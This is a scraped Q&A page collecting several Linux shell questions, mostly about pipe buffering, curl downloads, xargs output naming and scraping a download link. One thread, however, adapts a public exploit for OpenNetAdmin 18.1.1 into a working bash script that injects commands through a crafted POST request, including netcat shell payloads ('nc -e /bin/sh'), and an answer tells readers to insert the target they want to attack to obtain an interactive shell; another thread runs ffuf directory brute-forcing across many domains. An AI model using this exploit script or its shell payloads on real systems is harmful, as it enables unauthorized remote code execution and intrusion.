linux shell script stops after first line - linux

I try to execute etherwake based on a MQTT topic.
The output of mosquitto_sub stops if I pipe it in a while statement.
works:
# mosquitto_sub -L mqtt://... | grep -o -E '([[:xdigit:]]{2}:){5}[[:xdigit:]]{2}'
00:00:00:00:de:ad
00:00:00:00:be:ef
00:00:00:00:ca:fe
(goes on and on)
does not work:
mosquitto_sub -L mqtt://... \
| grep -o -E '([[:xdigit:]]{2}:){5}[[:xdigit:]]{2}' \
| hexdump
Output stops after a single line:
0000000 1234 5678 9abc def0 abcd cafe 3762 3a65
The big picture is this one:
mosquitto_sub -L mqtt://... \
| grep -o -E '([[:xdigit:]]{2}:){5}[[:xdigit:]]{2}' \
| while read macaddr; do
echo "send WOL to " $macaddr;
/usr/bin/etherwake -D -b "$macaddr" 2>&1;
done
Usually I am fine with the Linux shell but this time it simply gets stuck after the first line.
My guess is there is some problem with stdin or stdout (is not read or full etc.) in some kind. But I am out ideas.
By the way its an OpenWRT shell so an ash and no bash.

The problem is indeed the "buffering" of grep when used with pipes.
Usually the '--line-buffered' switch should be used to force grep to process the data line by line instead of buffer the data.
Because grep on OpenWRT (busybox) does not have this switch 'awk' is used:
mosquitto_sub -L mqtt://... \
| awk '/([[:xdigit:]]{2}:){5}[[:xdigit:]]{2}/{ print $0 }' \
| hexdump
If there is no busybox version of grep used the solution would be like:
mosquitto_sub -L mqtt://... \
| grep -o --line-buffered -E '([[:xdigit:]]{2}:){5}[[:xdigit:]]{2}' \
| hexdump
Thank you all a lot for your help.

Related

Linux curl : no url found (or) curl: malformed url

So I am downloading docker setup on my linux vm, and have to run this command as part of the steps, but even though it mentions url, and I changed once -o to -O but still getting those errors, what to do for this?
this is the command im running
sudo curl -L $(curl -L https://api.github.com/repos/docker/compose/releases/latest | grep "browser_download_url" | grep "$(uname -s)-$(uname -m)\"" | sed -nr 's/\s+"browser_download_url":\s+"(https.*)"/\1/p') -o /usr/local/bin/docker-compose
The grep that is filtering what system you are running is outputting an upper case L in Linux, this may be the cause of your errors. Try this:
sudo curl -L $(curl -L https://api.github.com/repos/docker/compose/releases/latest | grep "browser_download_url" | grep -i "$(uname -s)-$(uname -m)\"" | sed -nr 's/\s+"browser_download_url":\s+"(https.*)"/\1/p') -o /usr/local/bin/docker-compose
Hope this helps!

Bash Syntax Problems for Exploit

I found an exploit at exploit-db for the OpenNetAdmin 18.1.1
I have to adjust this script so it work for me but I don't get this done.
This is what I have so far:
URL="xxx.xxx.xxx.xxx/ona"
while true;do
echo -n {"nc -e /bin/sh xxx.xxx.xxx.xxx 4444 "}; read cmd
curl --silent -d "xajax=window_submit&xajaxr=1574117726710&xajaxargs[]=tooltips&xajaxargs[]=ip%3D%3E;echo \"BEGIN\";${cmd};echo \"END\"&xajaxargs[]=ping" "${URL}" | sed -n -e '/BEGIN/,/END/ p' | tail -n +2 | head -n -1
done
The output is just:
{nc -e /bin/sh xxx.xxx.xxx.xxx 4444 }
I am a bit struggling with the syntax.
What did I do wrong?
This is what you want, if you just need to launch the nc program. The script supposes that the remote machine is a Linux machine, with /bin/bash and nc (netcat) compiled with the -e support
#!/bin/bash
URL="http://.../ona"
cmd="nc -l -p 4444 -e /bin/sh"
curl --silent -d "xajax=window_submit&xajaxr=1574117726710&xajaxargs[]=tooltips&xajaxargs[]=ip%3D%3E;echo \"BEGIN\";${cmd};echo \"END\"&xajaxargs[]=ping" "${URL}" | sed -n -e '/BEGIN/,/END/ p' | tail -n +2 | head -n -1
I found a solution that fits:
#!/bin/bash
URL="http://xxx.xxx.xxx.xxx/ona/"
while true;do
echo -n "{/bin/sh -i}"; read cmd
curl --silent -d "xajax=window_submit&xajaxr=1574117726710&xajaxargs[]=tooltip>
done
Just replace the xxx.xxx.xxx.xxx with the target you want to attack and save the script as shell.sh
Now run the script with ./shell.sh and you get an interactive shell on the target system.
To verify that you can now type in pwd or id and check if you was successful.

How to store output for every xargs instance separately

cat domains.txt | xargs -P10 -I % ffuf -u %/FUZZ -w wordlist.txt -o output.json
Ffuf is used for directory and file bruteforcing while domains.txt contains valid HTTP and HTTPS URLs like http://example.com, http://example2.com. I used xargs to speed up the process by running 10 parallel instances. But the problem here is I am unable to store output for each instance separately and output.json is getting override by every running instance. Is there anything we can do to make output.json unique for every instance so that all data gets saved separately. I tried ffuf/$(date '+%s').json instead but it didn't work either.
Sure. Just name your output file using the domain. E.g.:
xargs -P10 -I % ffuf -u %/FUZZ -w wordlist.txt -o output-%.json < domains.txt
(I dropped cat because it was unnecessary.)
I missed the fact that your domains.txt file is actually a list of URLs rather than a list of domain names. I think the easiest fix is just to simplify domains.txt to be just domain names, but you could also try something like:
xargs -P10 -I % sh -c 'domain="%"; ffuf -u %/FUZZ -w wordlist.txt -o output-${domain##*/}.json' < domains.txt
cat domains.txt | xargs -P10 -I % sh -c "ping % > output.json.%"
Like this and your "%" can be part of the file name. (I changed your command to ping for my testing)
So maybe something more like this:
cat domains.txt | xargs -P10 -I % sh -c "ffuf -u %/FUZZ -w wordlist.txt -o output.json.%
"
I would replace your ffuf command with the following script, and call this from the xargs command. It just strips out the invalid file name characters and replaces them with a dot then runs the command:
#!/usr/bin/bash
URL=$1
FILE="`echo $URL | sed 's/:\/\//\./g'`"
ffuf -u ${URL}/FUZZ -w wordlist.txt -o output-${FILE}.json

Redirecting tail output into a program

I want to send a program the most recent lines from a text file using tail as stdin.
First, I echo to the program some input that will be the same every time, then send in tail input from an inputfile which should first be processed through sed. The following is the command line that I expect to work. But when the program runs it only receives the echo input, not the tail input.
(echo "new" && tail -f ~/inputfile 2> /dev/null | sed -n -r 'some regex' && cat) | ./program
However, the following works exactly as expected, printing everything out to the terminal:
echo "new" && tail -f ~/inputfile 2> /dev/null | sed -n -r 'some regex' && cat
So I tried with another type of output, and again while the echoed text posted, the tail text does not appear anywhere:
(echo "new" && tail -f ~/inputfile 2> /dev/null | sed -n -r 'some regex') | tee out.txt
This made me think it is a problem with buffering, but I tried the unbuffer program and all other advice here (https://superuser.com/questions/59497/writing-tail-f-output-to-another-file) without results. Where is the tail output going and how can I get it to go into my program as expected?
The buffering problem was resolved when I prefixed the sed command with the following:
stdbuf -i0 -o0 -e0
Much more preferable to using unbuffer, which didn't even work for me. Dave M's suggestion of using sed's relatively new -u also seems to do the trick.
One thing you may be getting confused by -- | (pipeline) is higher precedence than && (consecutive execution). So when you say
(echo "new" && tail -f ~/inputfile 2> /dev/null | sed -n -r 'some regex' && cat) | ./program
that is equivalent to
(echo "new" && (tail -f ~/inputfile 2> /dev/null | sed -n -r 'some regex') && cat) | ./program
So the cat isn't really doing anything, and the sed output is probably buffered a bit. You can try using the -u option to sed to get it to use unbuffered output:
(echo "new" && (tail -f ~/inputfile 2> /dev/null | sed -n -u -r 'some regex')) | ./program
I believe some versions of sed default to -u when the output is a terminal and not when it is a pipe, so that may be the source of the difference you're seeing.
You can use the i command in sed (see the command list in the manpage for details) to do the inserting at the beginning:
tail -f inputfile | sed -e '1inew file' -e 's/this/that/' | ./program

Search for string within html link on webpage and download the linked file

I am trying to write a linux script to search for a link on a web page and download the file from that link...
the webpage is:
http://ocram.github.io/picons/downloads.html
The link I am interested in is:
"hd.reflection-black.7z"
The original way I was doing this was using these commands..
lynx -dump -listonly http://ocram.github.io/picons/downloads.html &> output1.txt
cat output1.txt | grep "17" &> output2.txt
cut -b 1-6 --complement output2.txt &> output3.txt
wget -i output3.txt
I am hoping there is an easier way to search the webpage for the link "hd.reflection-black.7z" and save the linked file.
The files are stored on google drive which does not contain the filename in the url, hence the use of "17" in second line of code above..
#linuxnoob, if you to download the file (curl is more powerfull than wget):
curl -L --compressed `(curl --compressed "http://ocram.github.io/picons/downloads.html" 2> /dev/null | \
grep -o '<a .*href=.*>' | \
sed -e 's/<a /\n<a /g' | \
grep hd.reflection-black.7z | \
sed -e 's/<a .*href=['"'"'"]//' -e 's/["'"'"'].*$//' -e '/^$/ d')` > hd.reflection-black.7z
without indentation, for your script:
curl -L --compressed `(curl --compressed "http://ocram.github.io/picons/downloads.html" 2> /dev/null | grep -o '<a .*href=.*>' | sed -e 's/<a /\n<a /g' | grep hd.reflection-black.7z | sed -e 's/<a .*href=['"'"'"]//' -e 's/["'"'"'].*$//' -e '/^$/ d')` > hd.reflection-black.7z 2>/dev/null
You can try it!
What about?
curl --compressed "http://ocram.github.io/picons/downloads.html" | \
grep -o '<a .*href=.*>' | \
sed -e 's/<a /\n<a /g' | \
grep hd.reflection-black.7z | \
sed -e 's/<a .*href=['"'"'"]//' -e 's/["'"'"'].*$//' -e '/^$/ d'
I'd try to avoid using regular expressions since they tend to break in unexpected ways (e.g. the output is split in more than one line for some reason).
I suggest to use a scripting language like Ruby or Python, where higher level tools are available.
The following example is in Ruby:
#!/usr/bin/ruby
require 'rubygems'
require 'nokogiri'
require 'open-uri'
main_url = ARGV[0] # 'http://ocram.github.io/picons/downloads.html'
filename = ARGV[1] # 'hd.reflection-black.7z'
doc = Nokogiri::HTML(open(main_url))
url = doc.xpath("//a[text()='#{filename}']").first['href']
File.open(filename,'w+') do |file|
open(url,'r' ) do |link|
IO.copy_stream(link,file)
end
end
Save it to a file like fetcher.rb and then you can use it with
ruby fetcher.rb http://ocram.github.io/picons/downloads.html hd.reflection-black.7z
To make it work you'll have to install Ruby and the Nokogiri library (both are available on most distro's repositories)

Resources